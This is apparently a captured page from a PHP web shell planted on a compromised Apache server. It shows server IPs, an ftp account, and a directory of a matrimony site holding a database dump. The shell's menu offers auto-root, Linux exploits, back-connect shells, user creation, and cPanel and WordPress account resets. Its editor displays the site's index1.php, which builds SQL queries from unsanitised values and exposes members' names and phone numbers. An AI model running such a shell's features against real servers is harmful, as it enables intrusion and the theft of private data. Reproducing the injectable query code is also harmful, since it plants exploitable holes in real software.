Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
matrimony1 /
[ HOME SHELL ]
Name
Size
Permission
Action
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.htaccess
214
B
-rw-r--r--
Thumbs.db
2.5
KB
-rw-r--r--
afterlogin.html
11.12
KB
-rw-r--r--
blank.gif
49
B
-rw-r--r--
home.css
5.92
KB
-rw-r--r--
iepngfix.htc
5.1
KB
-rw-r--r--
iepngfix_tilebg.js
4.07
KB
-rw-r--r--
index.html
11.2
KB
-rw-r--r--
index1.php
16.87
KB
-rw-r--r--
matrimonial.sql
298.54
KB
-rw-r--r--
matrimony-registrationstep3.ph...
21.91
KB
-rw-r--r--
matrimony-registrationstep4.ph...
22.33
KB
-rw-r--r--
matrimony-registrationstep5.ph...
14.36
KB
-rw-r--r--
register5.php
75.82
KB
-rw-r--r--
subpage.css
192
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index1.php
<?php error_reporting(0); session_start(); include('../include/aryasamaj-clientinclude.php'); include("dynamicname.php"); include("vivah/dynamic_name.php"); include ("matriFunction.php"); $kg='Kgs'; $in='In'; $yr='yrs'; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="mymatrimonial.com, register, ytank.com, register" /> <meta name="keywords" content="matrimonial, website, match making" /> <title><?php echo $index; ?></title> <link href="css/home.css" rel="stylesheet" type="text/css" /> <link href="css/subpage.css" rel="stylesheet" type="text/css" /> <script src="js/slideshow.js" type="text/javascript"></script> <link href="css/slideshow.css" rel="stylesheet" type="text/css" /> <link href="css/image.css" type="text/css" rel="stylesheet" /> <script src="js/jquery-latest.js" language="JavaScript" type="text/javascript" ></script> <script src="js/thickbox.js" language="JavaScript" type="text/javascript"></script> <link href="js/thickbox.css" rel="StyleSheet" type="text/css" /> <script type="text/javascript" src="fade_image/jquery.cycle.all.2.74.js"></script> <script type="text/javascript" src="validation.js" language="javascript"></script> <script type="text/javascript" src="marquee/jscroller-0.4.js"></script> <!-- <script type="text/javascript" language="javascript"> $(function () { $(this).bind("contextmenu", function (e) { e.preventDefault(); }); }); </script> --> <script type="text/javascript" language="javascript" > $(document).ready(function() { $('.slideshow').cycle( { fx: 'fade' }); }); </script> <script type="text/javascript" language="javascript" > $(document).ready(function(){ // Add Scroller Object $jScroller.add("#box4_container","#box4_content","left",3,true); // Start Autoscroller $jScroller.start(); }); </script> <script language="javascript" type="text/javascript"> onload = CheckedBrideAndGroom; </script> <script language="JavaScript" type="text/javascript"> window.onbeforeunload = confirmExit; </script> <script language="javascript" type="text/javascript"> function show_Textsf(disp,ndisp) { document.getElementById(disp).style.display = "inline"; document.getElementById(ndisp).style.display = "none"; } </script> </head> <body> <?php include("header.php"); ?> <div class="mainbg"> <?php include("left.php"); ?> <div class="maincont"> <div class="mnc welcome"> <?php $selwelcome="select * from homepage"; $ressel=mysql_query($selwelcome); $fetchwelcome=mysql_fetch_array($ressel); ?> <h1> <?php $Content=$fetchwelcome["welcomemsg"]; $Content = str_replace("<p>"," ",$Content); $Content = str_replace("</p>"," ",$Content); echo $Content; ?> </h1> <?php echo $fetchwelcome["welcome_text"]; ?></div> <!-- fadding image --> <?php include("fadeimage.php"); ?> <div class="clr"></div> <!-- End fadding image --> <?php $selevent="select * from events WHERE event_visible='y' AND show_on_home='y' ORDER BY event_sequence LIMIT 1"; $event=mysql_query($selevent); while($fetchevent=mysql_fetch_array($event)) { ?> <div class="event mnc"> <div class="ld eph"> <a href="events_detail.php?eventid=<?php echo $fetchevent["event_id"]; ?>"><img src="vivah/event/thumb/<?php echo $fetchevent["event_image"];?>" width="140" alt=""/></a> </div> <div class="event_content"> <h1><a href="events_detail.php?eventid=<?php echo $fetchevent["event_id"]; ?>"><?php echo $fetchevent["event_title"];?></a></h1> <?php //echo $fetchevent["event_text"]; $Content=$fetchevent["event_text"]; $Content = str_replace("<p>"," ",$Content); $Content = str_replace("</p>"," ",$Content); echo substr($Content,0,200); if(strlen($Content) > 200) echo '...'; ?> <div> <a href="events_detail.php?eventid=<?php echo $fetchevent["event_id"]; ?>"><img src="images/rmpg.png" alt="Read More" border="0" /></a> </div> </div> <div class="clr"></div> </div> <?php } $selviewonhome1="select * from midp_homepage ORDER BY sequence"; $reshome1=mysql_query($selviewonhome1); while($fetchhome1=mysql_fetch_array($reshome1)) { $fetchhome1["homepage_id"]; $pagecontent1=$fetchhome1["left_part_detail"]; $contentvisible1=$fetchhome1["visible_home"]; if($pagecontent1=='latestBrideGroom' && $contentvisible1=='y') { ?> <div class="latest"> <div class="ltop"> <div class="lbot"> <div class="latest_profile"> <h1><a href="latestbride.php?gender=Female"><?php echo $latest_bride1; ?></a></h1> <?php $selregibride="select * from register where gender='female' AND approve='y' AND profile_visible='y' AND show_in_matrimonial='y' ORDER BY register_id DESC LIMIT 5"; $qrySelregibride=mysql_query($selregibride) or die('error in register table <br>'.mysql_error()); while($fetchbride=mysql_fetch_array($qrySelregibride)) { $totalbride=$fetchbride["register_id"]; ?> <div class="latest_photo"> <div class="pphoto" > <a class="thumbnail"><img src="user/thumb/<?php echo $fetchbride["photo"]; ?>" alt="" border="0" /><span><img alt=" " src="user/bigthumb/<?php echo $fetchbride["photo"];?>" /></span></a> </div> <div class="pphotobot"></div> <p><a href="userprofile.php?userId=<?php echo $fetchbride["register_id"]; ?>"><?php echo $fetchbride["name"]; ?> <?php echo $fetchbride["surname"]; ?></a><br /> <?php echo $fetchbride["age"]." ".$yr; ?> , <?php $hid=$fetchbride["height"]; $selheight=mysql_query("select * from height where height_id=".$hid.""); $fetchheight=mysql_fetch_array($selheight); $resheight=$fetchheight["height"]; echo $resheight; ?> ,<?php echo $fetchbride["weight"]." ".$kg; ?><br /> <?php $ediid=$fetchbride["education"]; $seledu="select * from education where id=".$ediid.""; $edu=mysql_query($seledu); $fetchedu=mysql_fetch_array($edu); echo $fetchedu["education"]; ?> <?php echo $in; ?> <?php $eduinid=$fetchbride["educationin"]; $seleduin="select * from education_in where id=".$eduinid.""; $eduin=mysql_query($seleduin); $fetcheduin=mysql_fetch_array($eduin); echo $fetcheduin["education_in"]; ?><br /> <?php if($fetchbride["city"] != "") { $cityid=$fetchbride["city"]; $selcity="select * from city where id='$cityid' "; $city=mysql_query($selcity); $fetchcity=mysql_fetch_array($city); echo $fetchcity["city"]; } else { echo $fetchbride["othercity"]; } ?> </p> <div class="clr"></div></div> <p align="right"><a href="latestbride.php?gender=Female"><b>More Brides</b></a></p> <?php } ?> </div> <div class="latest_profile"> <h1><a href="latestgroom.php?gender=Male"><?php echo $latest_groom1; ?></a></h1> <?php $selregigroom="select * from register where gender='male' AND approve='y' AND profile_visible='y' AND show_in_matrimonial='y' ORDER BY register_id DESC LIMIT 5"; $groom=mysql_query($selregigroom); while($fetchgroom=mysql_fetch_array($groom)) { $totalgroom=$fetchgroom["register_id"]; ?> <div class="latest_photo"> <div class="pphoto"> <a class="thumbnail"><img src="user/thumb/<?php echo $fetchgroom["photo"]; ?>" alt="" border="0" /><span><img src="user/bigthumb/<?php echo $fetchgroom["photo"]; ?>" alt="" border="" /></span></a> </div> <div class="pphotobot"></div> <p> <a href="userprofile.php?userId=<?php echo $fetchgroom["register_id"]; ?>"><?php echo $fetchgroom["name"]." ".$fetchgroom["surname"]; ?></a> <br /> <?php echo $fetchgroom["age"]." ".$yr; ?> , <?php $hid=$fetchgroom["height"]; $selheight=mysql_query("select * from height where height_id='$hid' "); $fetchheight=mysql_fetch_array($selheight); $resheight=$fetchheight["height"]; echo $resheight; ?> , <?php echo $fetchgroom["weight"]." ".$kg;?> <br /> <?php $ediid=$fetchgroom["education"]; $seledu="select * from education where id='$ediid' "; $edu=mysql_query($seledu); $fetchedu=mysql_fetch_array($edu); echo $fetchedu["education"]; ?> <?php echo $in; ?> <?php $eduinid=$fetchgroom["educationin"]; $seleduin="select * from education_in where id='$eduinid' "; $eduin=mysql_query($seleduin); $fetcheduin=mysql_fetch_array($eduin); echo $fetcheduin["education_in"]; ?> <br /> <?php if($fetchgroom["city"] != "") { $cityid=$fetchgroom["city"]; $selcity="select * from city where id='$cityid' "; $city=mysql_query($selcity); $fetchcity=mysql_fetch_array($city); echo $fetchcity["city"]; } else { echo $fetchgroom["othercity"]; } ?> </p> <div class="clr"></div></div> <?php } ?> <p align="right"><a href="latestgroom.php?gender=Male"><b>More Grooms</b></a></p> </div> <div class="clr"></div> </div> </div> </div> <?php } if($pagecontent1=='SearchBrideGroom' && $contentvisible1=='y') { ?> <div><?php include("search.php"); ?></div> <?php } ?> <!--content part--><!--content part--><!--content part--><!--content part--><!--content part--><!--content part--> <!-- <div class="maincont"> <div class="subtop"></div> <div class="subpage"> <h2>About us</h2> <?php $sel="select * from about_us"; $res=mysql_query($sel); while($fetch=mysql_fetch_array($res)) { ?> <?php echo $fetch["about_fck"]; ?> <?php } ?> </div> <div class="subbot"></div> </div><div class="clr"></div> --> <?php if($pagecontent1=='obituary' && $contentvisible1=='y') { ?> <div class="maincont"> <div class="subtop"></div> <div class="subpage"> <h2>Obituary</h2> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <?php $numSuccessResent = 0; $selquery="SELECT * FROM obituary"; $selmysql=mysql_query($selquery); while ($selfet=mysql_fetch_array($selmysql)) { $selfet_id = $selfet["obituary_id"]; $selfet_photo = $selfet["obituary_photo"]; $selfet_name = $selfet["obituary_name"]; $selfet_date = $selfet["obituary_date"]; $selfet_city = $selfet["obituary_city"]; if ($numSuccessResent!=0) { if($numSuccessResent % 5 == 0) { echo '</tr><tr>'; } } ?> <td valign="top"> <table width="130" border="0" cellspacing="0" cellpadding="0" align="center"> <tr><td><img alt="" src="vivah/obituary_image/thumb/<?php echo $selfet_photo; ?>" height="115" width="85" /></td></tr> <tr><td align="left"><a href="viewObituary.php"><?php echo $selfet_name; ?></a><br /> <?php echo date('d-m-Y',strtotime($selfet_date)); ?> <br /> <?php echo City("city",$selfet_city); ?></td></tr> </table> </td> <?php $numSuccessResent++; } echo '</tr>'; ?> </table> </div> <div class="subbot"></div> </div> <?php } ?> <!--communitymember part--><!--communitymember part--><!--communitymember part--><!--communitymember part--><!--communitymember part--> <?php if($pagecontent1=='communitymember' && $contentvisible1=='y') { ?> <div class="maincont"> <div class="subtop"></div> <div class="subpage"> <div style="float:left"> <h2>Community Member</h2> </div> <div style="float:right"> <a href="communitymember.php">View All</a> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <?php $numSuccessResent = 0; $selcommuquery="SELECT * FROM register WHERE show_in_matrimonial='n'"; $rescommuquery=mysql_query($selcommuquery); while ($selfetcomm=mysql_fetch_array($rescommuquery)) { $selfetcomm_id = $selfetcomm["register_id"]; $selfetcomm_photo = $selfetcomm["photo"]; $selfetcomm_name = ucwords($selfetcomm["name"])." ".ucwords($selfetcomm["surname"]); $selfetcomm_city = $selfetcomm["city"]; $memPhone = $selfetcomm["country_code"]."-".$selfetcomm["mobile"]; $memtaddress = $selfetcomm["contact_address"]; if ($numSuccessResent!=0) { if($numSuccessResent % 5 == 0) { echo '</tr><tr>'; } } ?> <td valign="top"> <table width="130" border="0" cellspacing="0" cellpadding="0" align="center"> <tr><td><img alt="" src="user/thumb/<?php echo $selfetcomm_photo; ?>" height="115" width="85" /></td></tr> <tr><td align="left"><a href="userprofile.php?userId=<?php echo $selfetcomm_id["register_id"]; ?>"><?php echo $selfetcomm_name; ?></a><br /> <?php echo $memPhone; ?> <br/> <?php echo City("city",$selfetcomm_city); ?></td></tr> </table> </td> <?php $numSuccessResent++; } echo '</tr>'; ?> </table> </div> <div class="subbot"></div> </div> <?php } ?> <!--communitymember part--><!--communitymember part--><!--communitymember part--><!--communitymember part--><!--communitymember part--> <?php if($pagecontent1=='birthday' && $contentvisible1=='y') { ?> <div class="maincont"> <div class="subtop"></div> <div class="subpage"> <h2>Birth</h2> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <?php $numSuccessResent1 = 0; $selquery1="SELECT * FROM birthday"; $selmysql1=mysql_query($selquery1); while ($selfet1=mysql_fetch_array($selmysql1)) { $selfet_id1 = $selfet1["birth_id"]; $selfet_photo1 = $selfet1["birth_photo"]; $selfet_name1 = $selfet1["birth_name"]; $selfet_date1 = $selfet1["birth_date"]; $selfet_city1 = $selfet1["birth_city"]; if ($numSuccessResent1!=0) { if($numSuccessResent1 % 5 == 0) { echo '</tr><tr>'; } } ?> <td valign="top"> <table width="130" border="0" cellspacing="0" cellpadding="0" align="center"> <tr> <td><img alt="" src="vivah/birthday_image/thumb/<?php echo $selfet_photo1; ?>" height="115" width="85" /></td> </tr> <tr> <td align="left"><a href="viewBirthday.php"><?php echo $selfet_name1; ?></a><br /> <?php echo date('d-m-Y',strtotime($selfet_date1)); ?> <br /> <?php echo City("city",$selfet_city1); ?></td> </tr> </table> </td> <?php $numSuccessResent1++; } echo '</tr><br />'; ?> </table> </div> <div class="subbot"></div> </div> <?php } if($pagecontent1=='hightlited_person' && $contentvisible1=='y') { ?> <div class="maincont"> <div class="subtop"></div> <div class="subpage"> <h2>Highlighted Persons</h2> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <?php $numSuccessResentH = 0; $selqueryH="SELECT * FROM highlighted_person WHERE person_visible='y'"; $selmysqlH=mysql_query($selqueryH); while ($selfetH=mysql_fetch_array($selmysqlH)) { $selfet_idH = $selfetH["person_id"]; $selfet_photoH = $selfetH["person_image"]; $hlpersontit=$selfetH["person_title"]; $selfet_nameH = $selfetH["person_name"]; $selfet_dateH = $selfetH["person_contact_detail"]; $selfet_cityH = $selfetH["person_city"]; if ($numSuccessResentH!=0) { if($numSuccessResentH % 5 == 0) { echo '</tr><tr>'; } } ?> <td valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> <tr><td><img alt="" src="vivah/highlited_person/thumb/<?php echo $selfet_photoH; ?>" height="115" width="85" /></td></tr> <tr><td align="left"><a href="highlighted_persons.php"><?php echo $selfet_nameH; ?></a><br /> <?php echo $hlpersontit; ?><br /> <?php echo $selfet_dateH; ?><br /> <?php echo City("city",$selfet_cityH); ?></td></tr> </table> </td> <?php $numSuccessResentH++; } echo '</tr>'; ?> </table> </div> <div class="subbot"></div> </div> <?php } } ?> </div> <div class="clr"></div> <div class="clr"></div> </div></div> <div class="clr"></div> <?php include("footer.php"); ?> </body> </html>
Close